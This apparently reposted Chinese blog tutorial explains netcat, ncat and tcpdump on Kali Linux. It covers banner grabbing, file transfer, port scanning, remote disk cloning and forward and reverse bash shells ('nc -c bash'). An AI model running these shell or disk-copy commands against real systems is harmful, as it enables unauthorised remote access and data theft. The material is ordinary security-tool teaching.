kali NETCAT NC的使用
文章目錄
- nc的常用選項(xiàng)
- NC具有的常用功能
- telnet / 獲取banner信息
- 傳輸文本信息
- 傳輸文件/目錄
- 加密傳文件
- 端口掃描
- 遠(yuǎn)程克隆硬盤
- 遠(yuǎn)程控制
- NCAT
- TCPDUMP簡單用法
nc的常用選項(xiàng)
-l 開啟監(jiān)聽模式,用于入站鏈接
-p 開放本地端口
-n 遠(yuǎn)程連接,后面要跟上端口
-v 顯示詳細(xì)信息
-q 執(zhí)行操作后退出,可以添加延遲時(shí)間
-z 端口掃描
-u UDP模式
-c 添加使用權(quán)限
NC具有的常用功能
? 網(wǎng)絡(luò)工具中的瑞?軍?——小身材、大智慧
? 偵聽模式 / 傳輸模式
? telnet / 獲取banner信息
? 傳輸文本信息
? 傳輸文件/目錄
? 加密傳輸文件
? 遠(yuǎn)程控制/木?
? 加密所有流量
? 流媒體服務(wù)器
? 遠(yuǎn)程克隆硬盤
telnet / 獲取banner信息
nc –nv 1.1.1.1 110
nc –nv 1.1.1.1 25
作用:可以通過連接端口獲取一些banner信息,確定服務(wù)器上開發(fā)的端口是不是此服務(wù)
例如:ssh服務(wù)工作端口是TCP 22
通過此圖,用nc連接目標(biāo)服務(wù)器22端口,不一定就是SSH服務(wù)
開放本地服務(wù)22端口,讓服務(wù)器通過ssh連接,可以發(fā)現(xiàn)服務(wù)器上SSH服務(wù)的banene信息
傳輸文本信息
A:nc -lp 4444
B:nc –nv 1.1.1.1 4444
作用:服務(wù)器可以開放本地端口,讓客戶端來連接此端口用來做聊天工具
服務(wù)器
客戶端
傳輸文件/目錄
傳輸文件:
A:nc -lp 333 > 1.mp4
B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1
或
A:nc -q 1 -lp 333 < a.mp4
B:nc -nv 1.1.1.1 333 > 2.mp4==
傳輸目錄
A:tar -cvf - music/ | nc -lp 333 –q 1
B:nc -nv 1.1.1.1 333 | tar -xvf –==
加密傳文件
A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
端口掃描
TCP掃描:
nc -nvz 1.1.1.1 1-65535==
UDP掃描:
nc –vnzu 1.1.1.1 1-1024
一般用NC使用UDP掃描準(zhǔn)確度非常低,不建議用NC掃
遠(yuǎn)程克隆硬盤
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
遠(yuǎn)程電子取證,可以將目標(biāo)服務(wù)器硬盤遠(yuǎn)程復(fù)制,或者內(nèi)存。
遠(yuǎn)程控制
正向控制:
A:nc -lp 333 -c bash
B:nc -nv 1.1.1.1 333==
反向控制:
A:nc -lp 333
B:nc -nv 1.1.1.1 333 -c bash
NCAT
NCAT比NC更具有安全性,支持加密和身份驗(yàn)證的能力,NC不支持。
ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
(–allow 進(jìn)行身份驗(yàn)證,–ssl進(jìn)行加密算法)
ncat -nv 1.1.1.1 333 --ssl
通過wireshark抓包對(duì)?比nc、ncat加密與不加密的流量
nc
NCAT
TCPDUMP簡單用法
No-GUI的抓包分析?工具
Linux、Unix系統(tǒng)默認(rèn)安裝
tcpdump -i eth0 -s 0 -w file.pcap
(-i選擇網(wǎng)卡,-w保存格式,-n篩選條件,-r讀取文件)
讀取抓包文件
cpdump -r file.pcap
TCPDUMP——篩選
? tcpdump -n -r http.cap | awk ‘{print $3}’| sort –u
? tcpdump -n src host 145.254.160.237 -r http.cap
? tcpdump -n dst host 145.254.160.237 -r http.cap
? tcpdump -n port 53 -r http.cap
? tcpdump -nX port 80 -r http.cap
總結(jié)
以上是生活随笔為你收集整理的kali NETCAT NC的使用的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: IIS-ShortName-Scanne
- 下一篇: centos8如何安装yum源(详细步骤